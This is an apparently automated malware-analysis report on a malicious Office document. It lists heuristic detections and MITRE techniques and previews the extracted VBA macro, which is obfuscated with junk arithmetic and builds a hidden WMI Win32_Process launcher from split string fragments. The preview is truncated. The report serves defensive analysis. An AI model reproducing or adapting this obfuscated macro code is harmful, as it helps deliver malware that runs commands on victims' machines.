MALICIOUS
342
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 Office Application Startup: VBA
The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate the use of legacy WordBasic auto-exec markers and VBA macros that leverage GetObject and CreateObject to launch the Win32_Process WMI class. This strongly suggests the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The obfuscation and use of WMI for process creation are common techniques in malware delivery.
Heuristics 9
-
ClamAV: Doc.Malware.00536d-6861525-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6861525-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 56178 bytes |
SHA-256: f672b1fbae277ba5de590f7008f9ebd362d4d94a92c3cbcd069e4c2ccd26984e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "t075439"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "d__631__"
Function B106_01()
If q_399222 <> R__22_ Then
c30__9 = (629167753)
G_37331 = j5__5_3 * 513261520 + V6162_ + CLng(P_19_40)
J93__78 = 180965085 / Hex(n___54 / Chr(w1519__0 - CDate(749198788)) * 542849814 / 114049885) / E561_446 - Fix(921820855)
F07961 = (649676437)
End If
If C_06_31 <> A1259_52 Then
f_26___7 = (731504101)
R7_6__ = Q0_46237 * 853970231 + Y__686 + CLng(p71_51)
i6_0492_ = 178389924 / Hex(n5_82973 / Chr(D3116_8 - CDate(270173622)) * 984620811 / 540898291) / W82_31_ - Fix(840989872)
q03_2_ = (962154173)
End If
If V7669_8_ <> z5582482 Then
r3416_ = (749598159)
Q_2724_8 = z80_351 * 647215821 + n9____ + CLng(S1_25_)
r_4440 = 582900281 / Hex(Z261064 / Chr(D_2303 - CDate(76075812)) * 662267171 / 191563317) / s40_373 - Fix(368797177)
E1265__3 = (651432364)
End If
If f__01_0_ <> z5_449 Then
V293_65_ = (68618296)
z42_7_ = o3_68_49 * 24381070 + q_28_51 + CLng(c52_5___)
a72_687 = 693198085 / Hex(o_5_085 / Chr(G8663571 - CDate(106277152)) * 88908244 / 776591268) / p89_0_0 - Fix(991476360)
w13__63 = (745462232)
End If
If E1___17 <> N__3_29 Then
A648__ = (922412858)
M5775__1 = C_6690_0 * 552738017 + G0901749 + CLng(s04381_0)
u8__691 = 614646956 / Hex(F60_29 / Chr(O6866_31 - CDate(107248950)) * 172397485 / 69431115) / w83_9__5 - Fix(401732153)
m2_7162 = (892381585)
End If
If b____2_ <> m6028_15 Then
t7_4_234 = (25699311)
b16714 = i_491_0_ * 992223476 + d3734287 + CLng(i___045)
b999739 = 857100774 / Hex(H4323_ / Chr(t367_6 - CDate(59589881)) * 927063374 / 940204186) / R069594 - Fix(966450233)
B9493_ = (389376880)
End If
End Function
Function I129_296(c43499_, K_37241_)
On Error Resume Next
If o__76_8 <> R243__91 Then
i_040_ = (320714998)
m_23_6 = f_2__8 * 416133249 + S615047 + CLng(l29301_)
F4_7_9__ = 166330287 / Hex(u44926 / Chr(s1901604 - CDate(581367514)) * 446634761 / 190773311) / V_560_ - Fix(559668078)
l21177_ = (972267945)
End If
If h_07371_ <> w_9317 Then
d3500_7 = (1425210)
v__59__ = d_8___ * 641580448 + m114_7 + CLng(X_10_359)
Q95_7_37 = 796768096 / Hex(V_18542 / Chr(B6__6_2 - CDate(522499492)) * 588954874 / 579732747) / u_5___ - Fix(588702703)
Z04513 = (6328688)
End If
Set a073069 = GetObject(L46__076 + "winmgm" + j_4_48__ + "ts:Win" + "32_Proce" + "ssStartup")
If Q_5812_ <> X38844 Then
q2920_7 = (319996542)
r2_0432 = w2__364 * 636583075 + b4_8_18 + CLng(i1_4203)
n_56208 = 314421928 / Hex(V_63__ / Chr(t810__ - CDate(735937672)) * 441410211 / 579005094) / j311___3 - Fix(99012560)
w8_5_9 = (266948925)
End If
If Q7_09_4_ <> Y_2__9 Then
p__348 = (501967029)
A9_7090 = P_2477 * 991607883 + Q1_8570 + CLng(w3463_)
O5__37 = 855471936 / Hex(G38553 / Chr(J__746 - CDate(799585243)) * 121768186 / 406291824) / o__41330 - Fix(839408902)
i1_168 = (24390989)
End If
If w103___8 <> J__0___ Then
u8_4__92 = (699709800)
b61__2_4 = D624___5 * 738269819 + a_223__4 + CLng(C_53____)
Z9__291_ = 33352908 / Hex(z__10__9 / Chr(w4317_ - CDate(76818577)) * 4420004 / 973848976) / w_7__4_ - Fix(538865725)
L6_21722 = (912913152)
End If
a073069.ShowWindow = 687668 - 687668
If f__181 <> k668_047 Then
P041__8 = (49918165)
M1_832_5 = S__7_5 * 311168717 + V2_2_94 + CLng(G_87460)
t69___0 = 209423656 / Hex(o578766_ / Chr(H__64309 - CDate(887438153)) * 637613229 / 549508609) / s70283 - Fix(952890107)
K8_3061 = (83965521)
End If
If Z8_2_6_2 <> P719606 Then
O__9417 = (217538408)
I75_062_ = U_0___2 * 7927175 + m97___9_ + CLng(V30561)
T340303 = 442057797 / Hex(i5_754 / Chr(A7_0_48 - CDate(102933997)) * 109297979 / 246016745) / V_179_9 - Fix(75640254)
l7_9432_ = (866501615)
End If
If i__6_6 <> E68791__ T
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.